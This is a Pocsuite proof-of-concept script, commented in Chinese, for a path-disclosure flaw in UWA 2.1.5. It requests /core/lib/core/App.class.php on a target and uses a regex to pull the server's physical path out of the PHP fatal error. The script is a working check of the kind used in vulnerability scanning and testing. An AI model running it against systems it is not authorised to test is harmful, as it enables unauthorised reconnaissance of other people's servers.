UWA 2.1.5 /core/lib/core/App.class.php 信息泄漏漏洞

                                                #!/usr/bin/env python
# coding: utf-8

import re

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '1768'  # vul ID
    version = '1'
    author = ['王畅']
    vulDate = '2014-12-16'
    createDate = '2014-12-26'
    updateDate = '2014-12-26'
    references = ['http://wooyun.org/bugs/wooyun-2014-087255']
    name = 'UWA 2.1.5 /core/lib/core/App.class.php 信息泄漏漏洞 POC'
    appPowerLink = 'http://asthis.net/'
    appName = 'UWA'
    appVersion = '2.1.5'
    vulType = 'Information Disclosure'
    desc = '''
           脚本开始执行时没有判断当前环境，直接访问时，定义新类的基类没有在当前环境中
           PHP爆出错误泄露当前物理路径
    '''
    # the sample sites for examine
    samples = ['']

    def _verify(self):
        result = {}

        target_url = '/core/lib/core/App.class.php'
        
        response = req.get(self.url + target_url, headers=self.headers, timeout=10)
        content = response.content
        match = re.findall(
            r"<b>Fatal error</b>:\s+Class 'Pfa' not found in <b>(.*)</b> on line <b>14</b><br\s?/>",
            content
        )
        if match:
            result['VerifyInfo'] = {
                'URL': self.url + target_url,
                'Path': match[0]
            }

        return self.parse_attack(result)

    def _attack(self):
        return self._verify()

    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('Internet Nothing returned')

        return output


register(TestPOC)